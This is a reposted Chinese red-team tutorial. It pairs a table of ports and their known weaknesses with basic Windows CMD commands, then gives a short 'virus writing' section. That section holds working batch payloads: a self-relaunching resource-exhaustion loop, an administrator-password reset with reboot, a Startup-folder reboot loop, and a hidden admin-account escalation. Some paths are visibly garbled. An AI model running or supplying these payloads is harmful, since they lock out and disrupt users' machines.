红队知识学习入门（4）Windows病毒编写

声明

学习视频来自B站UP主 泷羽sec,如涉及侵泷羽sec权马上删除文章笔记的只是方便各位师傅学习知识,以下网站涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负

1、端口号及对应漏洞

ftp:21

tenlnet:23

web:80

80-89:可能是web

443：ssl心脏滴血漏洞、web其他漏洞

445：smb

1433：mysql

1521：oracle

2082/2083：cpanel（主机管理系统登录（偏国外））

2222：da虚拟机主机管理系统登录（偏故国外）

3128：squid代理默认端口-漫游内网

3306：mysql

3312/3311:kangle主机管理系统登录

3389：远程桌面（前面文章有提到）

5432：postgreSQL

5900：vnc（前面文章有）

6379：redis（未授权）

7001.7002：weblogic 默认弱口令，反序列化

7778 kloxo：主机控制面板登录

8000-9090：一些常见的web端口，有些运维喜欢把管理后台开在非80端口上

8080：tomcat、wdcp主机管理系统，默认弱口令

8080，8089，9090：jboss

8083：vestacp主机管理系统（偏国外）

8649：ganglia

8888：宝塔 主机管理默认端口

10000：virtuamin/webmin 服务器虚拟主机管理系统

11211：memcache 未授权访问

27017，27018：mongodb未授权访问

28017：mongodb统计系统桌面

2、常用CMD基础命令

1、echo（输出）

echo ?/ （查看echo的帮助）

echo 123456 （输出123456）

echo 123456 > 666.txt(将123456重定向新建666.txt）

echo 123456 >> 666.txt(追加内容）

2、dir（列出当前目录所以文件）

3、d: c: cd（切换目录）

d：(切换到d盘）

c:（切换到c盘）

cd .(进入到当前目录）

cd ..(返回上一级目录）

cd/文件名（进入文件）

cd desktop(进入到界面）

4、tree(文件树状图）

tree /?(tree帮助）

tree /f（显示每个文件夹中的名称）

tree /a (用ascii字符输出）

tree C:\\User\Administrator /f

tree C:\\User\Administrator /a

5、创建目录、删除目录

md 666(创建666文件夹）

rd  666（删除666文件夹）

6、ipconfig /all（显示ip配置）

7、cls（清屏）

8、copy（复制拼接文件）

copy /? (查看帮助文档）

copy 1.txt ..\1.txt(把文件1.txt复制到上一级目录）

cd ..返回上一级目录

copy 1.txt+2.txt >3.txt（用echo输出两个文件，用copy将文件1和2拼接成3.txt

9、MOVE文件移动

move ..\1.txt 4.txt (将上一级目录1.txt移动到本级目录中，并且重命名为4.txt

10、ren（重命名）

ren 1.txt 2.txt

11、del（删除）

del 1.txt 2.txt （该删除是永久删除，回收箱找不到）

12、ping(探测主机ip是否存活）

ping \?(查看命令帮助文档）

ping -t www.baidu.com

13、type(显示文本内容）

echo hello>>1.txt

type 1.txt

14、reg(注册表）

reg \?

15、nslookup（探测域名信息）

nslookup www.baidu.com

nslookup -d www.baidu.com(查看历史解析记录）

16、find查找

find /？

echo 123456 >>1.txt 

find "a" 1.txt

type 1.txt | find "a"(查看1.txt的内容并且输出带有a参数的字段）

type 1.txt | find "a" /n （增添一个排序）

17、tasklist（显示当前进程的信息）

18、taskkill（结束进程）

taskkill \?（查看帮助文档）

taskkill /pid +进程号

/f 强制kill命令

19、ver.winver(显示版本）

20、start cmd

start calc(打开计算器）

start ping www.baidu.com -t (启动ping 并执行-t)

21、systeminfo(查看整个系统信息）

22、logoff（注销）

logoff \?（查看帮助文档）

远程登录3389桌面时，当该机器处于链接状态，可以使用该命令注销对方远程登录

23、shutdown 

shutdown /s  一分钟内关机

shutdown /a  计划取消

shutdown /r (重启）

shutdown /g 一分钟之内关机

shutdown /r /t 0(-t设置时间，设置为0立即执行）

shutdown /n 重启电脑

24、telnet(协议工具）

25、arp

arp -a(显示内网有哪些主机，方便于横向移动，用于发现同一网络主机）

26、at 定时任务

at time "shutdown /r  /t 0" 定时关机

at 1 /delete 取消命令

27、net （服务）

net stop telnet (关闭telnet）

net start telnet(开启telnet）

net user(查看当前用户）

net user admin 123 /add (添加用户名admin,密码为123）

net user admin(查看admin的权限）

net user administrator (查看管理员用户权限）

提权Windows

net localgroup administrator admin /add(提权）

net user admin(查看admin用户权限）

实战编写病毒

资源耗尽病毒

echo start cmd > 1.txt

echo %0 >> 1.txt

ren 1.txt 1.bat

利用echo将启动cmd窗口命令写入到1.txt文件中，接着%0表示用于无限循环执行当前批处理文件，然后将1.txt文件改成1.bat脚本文件，执行后就会无限循环执行启动cmd窗口

锁机病毒

echo net user administrator 123456 > c:\windows\Temp\1.bat

echo shutdown /r /t 0 >> c:\windows\Temp\1.bat

无限重启病毒原理

echo shutdown -s -t 0>c:\windows\Templ1.bat

将关机命令写入到1.bat文件

copyc:\windows\Templ1.bat %USERPROFILE%\AppDataRoaminglMicrosoft\windows\Start\MenulProgramsStartupl'

将写好的命令脚本到开机自启动目录，当电脑开机时就启动这个脚本，运行关机命令

最后，制作不易，您的点赞是对我最大的支持，感谢大家点赞关注一键三连，未来我还会更新更多红队文章

原文地址：https://blog.csdn.net/Zeu_s/article/details/143495619

免责声明：本站文章内容转载自网络资源，如本站内容侵犯了原著者的合法权益，可联系本站删除。更多内容请关注自学内容网（zxcms.com）！